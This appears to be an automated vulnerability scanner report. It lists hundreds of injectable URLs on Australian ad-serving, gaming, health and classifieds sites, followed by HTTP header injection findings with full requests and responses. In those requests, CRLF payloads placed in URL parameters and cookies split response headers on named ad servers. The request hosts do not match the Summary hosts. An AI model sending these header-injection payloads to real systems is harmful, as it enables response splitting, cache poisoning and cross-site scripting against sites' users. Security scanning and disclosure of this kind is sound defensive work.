2.685. http://media.sensis.com.au/hserver/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 1]

2.686. http://media.sensis.com.au/hserver/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 2]

2.687. http://media.sensis.com.au/hserver/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]

2.688. http://media.sensis.com.au/hserver/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 1]

2.689. http://media.sensis.com.au/hserver/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 2]

2.690. http://media.sensis.com.au/hserver/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]

2.691. http://media.sensis.com.au/hserver/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415 [REST URL parameter 1]

2.692. http://media.sensis.com.au/hserver/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415 [REST URL parameter 2]

2.693. http://media.sensis.com.au/hserver/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415 [name of an arbitrarily supplied request parameter]

2.694. http://media.sensis.com.au/hserver/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007 [REST URL parameter 1]

2.695. http://media.sensis.com.au/hserver/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007 [REST URL parameter 2]

2.696. http://media.sensis.com.au/hserver/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007 [name of an arbitrarily supplied request parameter]

2.697. http://media.sensis.com.au/hserver/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 1]

2.698. http://media.sensis.com.au/hserver/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 2]

2.699. http://media.sensis.com.au/hserver/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]

2.700. http://media.sensis.com.au/hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 [REST URL parameter 1]

2.701. http://media.sensis.com.au/hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 [REST URL parameter 2]

2.702. http://media.sensis.com.au/hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 [name of an arbitrarily supplied request parameter]

2.703. http://media.sensis.com.au/hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 [name of an arbitrarily supplied request parameter]

2.704. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 1]

2.705. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 2]

2.706. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]

2.707. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 1]

2.708. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 2]

2.709. http://media.sensis.com.au/hserver/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]

2.710. http://media.sensis.com.au/jserver/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 [REST URL parameter 1]

2.711. http://media.sensis.com.au/jserver/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 [REST URL parameter 2]

2.712. http://media.sensis.com.au/jserver/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415 [name of an arbitrarily supplied request parameter]

2.713. http://media.sensis.com.au/jserver/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 [REST URL parameter 1]

2.714. http://media.sensis.com.au/jserver/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 [REST URL parameter 2]

2.715. http://media.sensis.com.au/jserver/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415 [name of an arbitrarily supplied request parameter]

2.716. http://media.sensis.com.au/jserver/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 [REST URL parameter 1]

2.717. http://media.sensis.com.au/jserver/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 [REST URL parameter 2]

2.718. http://media.sensis.com.au/jserver/acc_random=986959504930/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=300x250/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=260571614373 [name of an arbitrarily supplied request parameter]

2.719. http://www.bigpondoffice.com.au/common/main.tfo [REST URL parameter 1]

2.720. http://www.gamearena.com.au/news/ [name of an arbitrarily supplied request parameter]

2.721. http://www.gamearena.com.au/shop/games/ [name of an arbitrarily supplied request parameter]

2.722. http://www.gamearena.com.au/shop/games/title/hearts-medicine-season-one/index.php [REST URL parameter 5]

2.723. http://www.gamearena.com.au/shop/games/title/hearts-medicine-season-one/index.php [name of an arbitrarily supplied request parameter]

2.724. http://www.gamearena.com.au/shop/games/title/secret-diaries-florence-ashford/index.php [REST URL parameter 5]

2.725. http://www.gamearena.com.au/shop/games/title/secret-diaries-florence-ashford/index.php [name of an arbitrarily supplied request parameter]

2.726. http://www.gamearena.com.au/shop/games/title/the-seawise-chronicles-untamed-legacy/index.php [REST URL parameter 5]

2.727. http://www.gamearena.com.au/shop/games/title/the-seawise-chronicles-untamed-legacy/index.php [name of an arbitrarily supplied request parameter]

2.728. http://www.gamearena.com.au/shop/games/title/the-treasures-of-mystery-island-2-the-gates-of-fate/index.php [REST URL parameter 5]

2.729. http://www.gamearena.com.au/shop/games/title/the-treasures-of-mystery-island-2-the-gates-of-fate/index.php [name of an arbitrarily supplied request parameter]

2.730. http://www.gamearena.com.au/shop/mobile/ [name of an arbitrarily supplied request parameter]

2.731. http://www.gamearena.com.au/shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php [REST URL parameter 5]

2.732. http://www.gamearena.com.au/shop/mobile/game.x/call-of-duty-black-ops-mobile/index.php [name of an arbitrarily supplied request parameter]

2.733. http://www.telstra.net/ops/ [REST URL parameter 1]

2.734. http://www.utest.com/how-it-works/agile-testing [name of an arbitrarily supplied request parameter]

2.735. http://www.utest.com/intro [name of an arbitrarily supplied request parameter]

2.736. http://www.utest.com/meet-testers [name of an arbitrarily supplied request parameter]

2.737. http://www.utest.com/pricing [name of an arbitrarily supplied request parameter]

2.738. http://www.utest.com/what-we-test/desktop-application-testing [name of an arbitrarily supplied request parameter]

2.739. http://www.utest.com/what-we-test/gaming-application-testing [name of an arbitrarily supplied request parameter]

2.740. http://www.virtualmedicalcentre.com/ [name of an arbitrarily supplied request parameter]

2.741. http://www.virtualmedicalcentre.com/calc.asp [name of an arbitrarily supplied request parameter]

2.742. http://www.virtualmedicalcentre.com/caloriecounter.asp [name of an arbitrarily supplied request parameter]

2.743. http://www.virtualmedicalcentre.com/caloriecounter.asp [name of an arbitrarily supplied request parameter]

2.744. http://www.virtualmedicalcentre.com/diseases.asp [name of an arbitrarily supplied request parameter]

2.745. http://www.virtualmedicalcentre.com/experiences.asp [name of an arbitrarily supplied request parameter]

2.746. http://www.virtualmedicalcentre.com/featuredpages.asp [name of an arbitrarily supplied request parameter]

2.747. http://www.virtualmedicalcentre.com/healthandlifestyle.asp [name of an arbitrarily supplied request parameter]

2.748. http://www.virtualmedicalcentre.com/healthinvestigations.asp [name of an arbitrarily supplied request parameter]

2.749. http://www.virtualmedicalcentre.com/treatments.asp [name of an arbitrarily supplied request parameter]

2.750. http://www.virtualmedicalcentre.com/videopage.asp [name of an arbitrarily supplied request parameter]

2.751. http://bigpondmusic.com/mixtapes/create [Referer HTTP header]

2.752. http://bigpondmusic.com/mixtapes/favourites [Referer HTTP header]

2.753. http://bigpondmusic.com/mixtapes/my [Referer HTTP header]

2.754. http://mysite.com/accordion.htm [Referer HTTP header]

2.755. http://www.tradingpost.com.au/ [SelectedState cookie]

2.756. http://www.tradingpost.com.au/Automotive/Browse [SelectedState cookie]

2.757. http://www.tradingpost.com.au/Automotive/Caravans/Browse [SelectedState cookie]

2.758. http://www.tradingpost.com.au/Automotive/Motorbikes-ATVs/Browse [SelectedState cookie]

2.759. http://www.tradingpost.com.au/Automotive/Trailers/Browse [SelectedState cookie]

2.760. http://www.tradingpost.com.au/Automotive/Wheels-Tyres-Parts-Accessories/Browse [SelectedState cookie]

2.761. http://www.tradingpost.com.au/Boats/Browse [SelectedState cookie]

2.762. http://www.tradingpost.com.au/Browse/View-All [SelectedState cookie]

2.763. http://www.tradingpost.com.au/Business-Office/Browse [SelectedState cookie]

2.764. http://www.tradingpost.com.au/Buy [SelectedState cookie]

2.765. http://www.tradingpost.com.au/CommunityPage/LandingPage [SelectedState cookie]

2.766. http://www.tradingpost.com.au/DIY-Home-Renovations/Browse [SelectedState cookie]

2.767. http://www.tradingpost.com.au/Garden-Outdoor-Living/Browse [SelectedState cookie]

2.768. http://www.tradingpost.com.au/Home [SelectedState cookie]

2.769. http://www.tradingpost.com.au/Pets-Horses/Browse [SelectedState cookie]

2.770. http://www.tradingpost.com.au/Real-Estate/Browse [SelectedState cookie]

2.771. http://www.tradingpost.com.au/Rural-Machinery/Browse [SelectedState cookie]

2.772. http://www.tradingpost.com.au/Sell [SelectedState cookie]

2.773. http://www.tradingpost.com.au/Sell-Car/LandingPage [SelectedState cookie]

2.774. http://www.tradingpost.com.au/Sport-Leisure-Travel/Browse [SelectedState cookie]

2.775. http://www.tradingpost.com.au/TrustAndSafety/LandingPage [SelectedState cookie]

2.776. https://www.tradingpost.com.au/Sell [SelectedState cookie]



1. HTTP header injection  next
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://ad.au.vulnerable.ad.partner/ad/N799.Sensis12/B4964893.2 [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /ad/N799.Sensis12/B4964893.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2eb19%0d%0a0017009d30b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2eb19%0d%0a0017009d30b/N799.Sensis12/B4964893.2;sz=300x250;click=http://media.sensis.com.au/ADCLICK/CID=000341f81f45920200000000/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415/relocate=;ord=676490127433?\ HTTP/1.1
Host: ad.au.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.0 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2eb19
0017009d30b
/N799.Sensis12/B4964893.2;sz=300x250;click=http://media.sensis.com.au/ADCLICK/CID=000341f81f45920200000000/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415/relocate%3D%3Bord%3D676490127433

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.au.vulnerable.ad.partner/adj/N4517.128549.SENSISMEDIASMART3/B4907445 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N4517.128549.SENSISMEDIASMART3/B4907445

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 56c09%0d%0a5d40b08f4f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /56c09%0d%0a5d40b08f4f5/N4517.128549.SENSISMEDIASMART3/B4907445;abr=!ie;click=http://media.sensis.com.au/ADCLICK/CID=0003307e1f45920200000000/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415/relocate=;sz=300x250;ord=951172862928? HTTP/1.1
Host: ad.au.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.0 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/56c09
5d40b08f4f5
/N4517.128549.SENSISMEDIASMART3/B4907445;abr=!ie;click=http://media.sensis.com.au/ADCLICK/CID=0003307e1f45920200000000/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415/relocate%3D%3Bsz%3D300

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.au.vulnerable.ad.partner/jump/N799.Sensis12/B4964893.2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /jump/N799.Sensis12/B4964893.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6a7fd%0d%0aac0f46de021 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6a7fd%0d%0aac0f46de021/N799.Sensis12/B4964893.2;sz=300x250;click=http://media.sensis.com.au/ADCLICK/CID=000341f81f45920200000000/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415/relocate=;ord=676490127433?\ HTTP/1.1
Host: ad.au.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.0 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6a7fd
ac0f46de021
/N799.Sensis12/B4964893.2;sz=300x250;click=http://media.sensis.com.au/ADCLICK/CID=000341f81f45920200000000/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415/relocate%3D%3Bord%3D676490127433

<h1>Error 302 Moved Temporarily</h1>

1.4. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 10a5a%0d%0af9168891924 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=010a5a%0d%0af9168891924; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=010a5a
f9168891924
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Connection: close


1.5. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [Pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the Pos request parameter is copied into the Set-Cookie response header. The payload 504f0%0d%0a52c6ed00ba4 was submitted in the Pos parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=2006011&Page=&PluID=0&Pos=504f0%0d%0a52c6ed00ba4 HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
